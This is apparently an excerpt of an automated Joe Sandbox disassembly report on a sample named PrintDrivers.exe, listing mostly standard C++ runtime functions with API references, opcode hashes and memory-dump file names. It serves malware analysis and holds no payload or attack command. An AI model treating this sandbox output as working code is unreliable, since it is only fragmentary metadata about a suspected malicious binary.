                                                                    • String ID:
                                                                    • API String ID: 712880209-0
                                                                    • Opcode ID: 2a43488bf508957ac076f1c7d64d55d7e5cd013975a9d0e9806b0fc2f1b1ad32
                                                                    • Instruction ID: b5b640efe73b1e440e65d4abecc5275e76a1555d7182cc4743b22c7de0c87416
                                                                    • Opcode Fuzzy Hash: 2a43488bf508957ac076f1c7d64d55d7e5cd013975a9d0e9806b0fc2f1b1ad32
                                                                    • Instruction Fuzzy Hash: 7501AD3590061A9BCF05EBA4885DABE7FA1FF84320F244509F815AB291EF709E068B80
                                                                    Function 00595DEB Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595DF2
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595DFC
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 00595E36
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595E4D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595E6D
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: 6d32f106c71cf24462c48119c730614cf8332c1b800aa627f40fd9bfd6621a27
                                                                    • Instruction ID: e77c49c97eca37a0f765fa5d396a6bfe197e2ccb0ea26e7fdf3690558b9d05a1
                                                                    • Opcode Fuzzy Hash: 6d32f106c71cf24462c48119c730614cf8332c1b800aa627f40fd9bfd6621a27
                                                                    • Instruction Fuzzy Hash: 9401C03590061ACBCF05FBA0C859ABE7FA5FFC4320F250548F811AB291EF709E068B80
                                                                    Function 00595E80 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595E87
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595E91
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • collate.LIBCPMT ref: 00595ECB
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595EE2
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595F02
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                    • String ID:
                                                                    • API String ID: 1007100420-0
                                                                    • Opcode ID: e4f0c33038c8c14151175f6c63063aecb735bb9f6e97c31cc38b0cf5748d41a9
                                                                    • Instruction ID: 4736012f5f1870a9ba647a5fe40ced1c30cfa83171bfc116b7e3f1a2e5178b5d
                                                                    • Opcode Fuzzy Hash: e4f0c33038c8c14151175f6c63063aecb735bb9f6e97c31cc38b0cf5748d41a9
                                                                    • Instruction Fuzzy Hash: 2101A1359006168BCF05FBA0C849ABE7FA5FFC4310F140548F8156B291EF749E05CB90
                                                                    Function 00595F15 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595F1C
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • ctype.LIBCPMT ref: 00595F60
                                                                    • std::_Facet_Register.LIBCPMT ref: 00595F77
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                    • String ID:
                                                                    • API String ID: 83828444-0
                                                                    • Opcode ID: bd57ef8c03a24ec6f028b646d39d781d741ce6edac76c31238b099805b3839b0
                                                                    • Instruction ID: e880ed0a41da4341392f916b58214a4d64b763f9d5d7c7dc42b0c84262e2095d
                                                                    • Opcode Fuzzy Hash: bd57ef8c03a24ec6f028b646d39d781d741ce6edac76c31238b099805b3839b0
                                                                    • Instruction Fuzzy Hash: 4101A17590061A9FCF05EBA48859ABE7FB1FFC4320F140509F4556B291EF709E05CB81
                                                                    Function 00595FAA Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 00595FB1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00595FBB
                                                                      • Part of subcall function 005881E0: std::_Lockit::_Lockit.LIBCPMT ref: 00588210
                                                                      • Part of subcall function 005881E0: std::_Lockit::~_Lockit.LIBCPMT ref: 00588238
                                                                    • messages.LIBCPMT ref: 00595FF5
                                                                    • std::_Facet_Register.LIBCPMT ref: 0059600C
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0059602C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                    • String ID:
                                                                    • API String ID: 2750803064-0
                                                                    • Opcode ID: ffdcd424151f57ebb858f85c239507ee6b71ec3b0cc44baa3b1e6c5cd3f372df
                                                                    • Instruction ID: 2e6189be0567dd2ea31fb154eda576422c1c42967bcc69e3f8d69d7afb9b6710
                                                                    • Opcode Fuzzy Hash: ffdcd424151f57ebb858f85c239507ee6b71ec3b0cc44baa3b1e6c5cd3f372df
                                                                    • Instruction Fuzzy Hash: DB01AD3590021A9BCF05FBA0884DABE7FA1FF84320F241509F810AB291DF709E0ACB80
                                                                    Function 005BD72E Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 005BD746
                                                                      • Part of subcall function 005B6238: HeapFree.KERNEL32(00000000,00000000,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?), ref: 005B624E
                                                                      • Part of subcall function 005B6238: GetLastError.KERNEL32(?,?,005BD9CF,?,00000000,?,?,?,005BDC72,?,00000007,?,?,005BE165,?,?), ref: 005B6260
                                                                    • _free.LIBCMT ref: 005BD758
                                                                    • _free.LIBCMT ref: 005BD76A
                                                                    • _free.LIBCMT ref: 005BD77C
                                                                    • _free.LIBCMT ref: 005BD78E
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: e69f4ad8cba7ea251906260e85370a879746d70718278bc4167b4d8b121bd4d5
                                                                    • Instruction ID: 589c69bbb7ec096bbf52dd24406000cd160c4623ca552681b73ec698eee39fa0
                                                                    • Opcode Fuzzy Hash: e69f4ad8cba7ea251906260e85370a879746d70718278bc4167b4d8b121bd4d5
                                                                    • Instruction Fuzzy Hash: A9F01237505205ABD620EB58F5CADD6BBEDFB547107A44916F00ADB501DB38FC808B65
                                                                    Function 0059F358 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3__swprintfctype
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 815090475-1402515088
                                                                    • Opcode ID: 3f7d546adf471f91502bfdc070e22e883cbc59ee72fd6b62fa143179c492e5f1
                                                                    • Instruction ID: 653ee3d36a0e3761d12e58c5c6d125adf62559806ce021dde9dc25c80754d7cc
                                                                    • Opcode Fuzzy Hash: 3f7d546adf471f91502bfdc070e22e883cbc59ee72fd6b62fa143179c492e5f1
                                                                    • Instruction Fuzzy Hash: CC517A72D00209ABDF05EFD4D849ADE7FB9FF48310F204859F845AB291DB799948CB90
                                                                    Function 005A370A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 139COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3__swprintfctype
                                                                    • String ID: %.0Lf
                                                                    • API String ID: 815090475-1402515088
                                                                    • Opcode ID: d325cf075659a2ba76ad5f88547007f12f2041035c2fb11df52ed58cc71edbbc
                                                                    • Instruction ID: 2ef53279515a88e44e4eadc0ca5eebaf778574c6fee46a3f97a19af3adc3bac0
                                                                    • Opcode Fuzzy Hash: d325cf075659a2ba76ad5f88547007f12f2041035c2fb11df52ed58cc71edbbc
                                                                    • Instruction Fuzzy Hash: F3516AB2D00209ABCF05EFD4C849ADEBFB9FB48314F204459F446AB295DB759A49CF90
                                                                    Function 005A35A1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 005A35A8
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    • _Find_elem.LIBCPMT ref: 005A3642
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 3042121994-2494171821
                                                                    • Opcode ID: 7607ea0db42f393daf5a97937bbcf2763ea184bc9afee1745de415f43c60c6c1
                                                                    • Instruction ID: 08f7d9f9e22806718aa5e1643441bee7ecfc6bf8a21d760f96ea251e02cc0204
                                                                    • Opcode Fuzzy Hash: 7607ea0db42f393daf5a97937bbcf2763ea184bc9afee1745de415f43c60c6c1
                                                                    • Instruction Fuzzy Hash: 7D417A31900209EFCF09EF94D885AEEBFB5FF59314F100059F811A7292DB359A46CBA5
                                                                    Function 005B3D98 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: C:\Games\PrintDrivers.exe
                                                                    • API String ID: 0-3864340707
                                                                    • Opcode ID: ba25282a1faa881f1b46733896fe6720c2abf6cffcde5b2685c5d4cbd3973f60
                                                                    • Instruction ID: 1a228f6c29688c184271b1f6bad3a97a97983c42edf77cf7772133cdd975d33d
                                                                    • Opcode Fuzzy Hash: ba25282a1faa881f1b46733896fe6720c2abf6cffcde5b2685c5d4cbd3973f60
                                                                    • Instruction Fuzzy Hash: 5B315C71A00659AFCB25DB9998899EEBFBCFBD9310B500067F401EB251E770AB44DB90
                                                                    Function 0059F22B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059F232
                                                                      • Part of subcall function 00595F15: __EH_prolog3.LIBCMT ref: 00595F1C
                                                                      • Part of subcall function 00595F15: std::_Lockit::_Lockit.LIBCPMT ref: 00595F26
                                                                      • Part of subcall function 00595F15: std::_Lockit::~_Lockit.LIBCPMT ref: 00595F97
                                                                    • _Find_elem.LIBCPMT ref: 0059F2CE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                    • String ID: %.0Lf$0123456789-
                                                                    • API String ID: 2544715827-3094241602
                                                                    • Opcode ID: 2b874b6b5261be6d3464600377e40dc45651aedcd7204d4edb25ec9091ccce50
                                                                    • Instruction ID: 95844ede2b381c7b6a22852395b0c2c61527e012a58460c19be45579350c3023
                                                                    • Opcode Fuzzy Hash: 2b874b6b5261be6d3464600377e40dc45651aedcd7204d4edb25ec9091ccce50
                                                                    • Instruction Fuzzy Hash: C8416B3590021ADFCF05DFD4C988AEEBFB5FF55314F100169E801AB252DB349A56CBA1
                                                                    Function 0059F4F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0059F4F7
                                                                      • Part of subcall function 00587BD0: std::_Lockit::_Lockit.LIBCPMT ref: 00587C17
                                                                      • Part of subcall function 00587BD0: std::_Lockit::_Lockit.LIBCPMT ref: 00587C39
                                                                      • Part of subcall function 00587BD0: std::_Lockit::~_Lockit.LIBCPMT ref: 00587C61
                                                                      • Part of subcall function 00587BD0: std::_Lockit::~_Lockit.LIBCPMT ref: 00587DCE
                                                                    • _Find_elem.LIBCPMT ref: 0059F593
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                    • String ID: 0123456789-$0123456789-
                                                                    • API String ID: 3042121994-2494171821
                                                                    • Opcode ID: 0abb2c91cbf953228391877ece15bdbe3ff2e5d2ec6f3459aaeedd11d3866312
                                                                    • Instruction ID: ad5de15abb0a6a7d04f58d7b5426e5adf659d4088c621e1d79df5f7bd2865e1c
                                                                    • Opcode Fuzzy Hash: 0abb2c91cbf953228391877ece15bdbe3ff2e5d2ec6f3459aaeedd11d3866312
                                                                    • Instruction Fuzzy Hash: 7C416831900219DFCF05EFA4C888AEEBFB5FF48314F110169E811AB256DB34DA56CBA5
                                                                    Function 0059AB9E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0059ABA5
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595627
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595644
                                                                      • Part of subcall function 00595607: _Maklocstr.LIBCPMT ref: 00595661
                                                                      • Part of subcall function 00595607: _Maklocchr.LIBCPMT ref: 00595673
                                                                      • Part of subcall function 00595607: _Maklocchr.LIBCPMT ref: 00595686
                                                                    • _Mpunct.LIBCPMT ref: 0059AC32
                                                                    • _Mpunct.LIBCPMT ref: 0059AC4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 2939335142-1686923651
                                                                    • Opcode ID: eb2341a041620b5f241bf67ea5e633427366f754ffb0234a652ebdf6700dbbb1
                                                                    • Instruction ID: 0947d851743e0815039d62ef405ba00c26cd697415626275ec2e56a8889e1e6d
                                                                    • Opcode Fuzzy Hash: eb2341a041620b5f241bf67ea5e633427366f754ffb0234a652ebdf6700dbbb1
                                                                    • Instruction Fuzzy Hash: F5217FB1904A526FDB25DF74C894B7BBEE8BB49300F04095AF499C7A41E730EA05CBE1
                                                                    Function 005A1E5C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Mpunct$H_prolog3
                                                                    • String ID: $+xv
                                                                    • API String ID: 4281374311-1686923651
                                                                    • Opcode ID: ce4ef8569a516010f0b6692daafbd9602208eb3d476e393a9062302c82523c30
                                                                    • Instruction ID: 81a07ed31611f13be05101fecf8242988a5666c1b0a1eb24488d6e0845f30261
                                                                    • Opcode Fuzzy Hash: ce4ef8569a516010f0b6692daafbd9602208eb3d476e393a9062302c82523c30
                                                                    • Instruction Fuzzy Hash: 3D2183B1904A526ED721DF748884B7FBFF8BB4D300F04091AE499C7A41E730EA05CBA0
                                                                    Function 00592779 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog3_
                                                                    • String ID: false$iw]$true
                                                                    • API String ID: 2427045233-1778967338
                                                                    • Opcode ID: 09d6cde5d6d944515bf2603fb844ce07949410fd960dc612fc057280c711ea8b
                                                                    • Instruction ID: 9301395ea74c9f419c994834e3545cf74c95aa49ee76f306267f97be9253414b
                                                                    • Opcode Fuzzy Hash: 09d6cde5d6d944515bf2603fb844ce07949410fd960dc612fc057280c711ea8b
                                                                    • Instruction Fuzzy Hash: 6C118E75944746AECB20EFB4D405A9ABFF4BF19700F04891AF5959B741EB30A504CB60
                                                                    Function 005B6D40 Relevance: 6.3, APIs: 4, Instructions: 320COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _strrchr
                                                                    • String ID:
                                                                    • API String ID: 3213747228-0
                                                                    • Opcode ID: 9ce9449626763898fba8829ac99a917786efb0f9d0c04e5bf98ad664dd137c8c
                                                                    • Instruction ID: 42bc9d2fbfa4ee588d014964cbb7585a982c64680eb187c00eb38febd1330af4
                                                                    • Opcode Fuzzy Hash: 9ce9449626763898fba8829ac99a917786efb0f9d0c04e5bf98ad664dd137c8c
                                                                    • Instruction Fuzzy Hash: 27B1167290428A9FDB118F64C885BFEBFF5FF99340F24406AE4459B241D639ED01CB60
                                                                    Function 00589160 Relevance: 6.3, APIs: 4, Instructions: 295memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 0058921F
                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000000), ref: 0058923F
                                                                      • Part of subcall function 00581AD0: LocalAlloc.KERNEL32(00000040,80000022,?,?), ref: 00581B57
                                                                      • Part of subcall function 00581AD0: LocalFree.KERNEL32(?,?), ref: 00581BFD
                                                                    • LocalFree.KERNEL32(00000008,?,?,?,?,?,00000000), ref: 005892A4
                                                                    • __cftoe.LIBCMT ref: 005893D0
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Local$Alloc$Free$__cftoe
                                                                    • String ID:
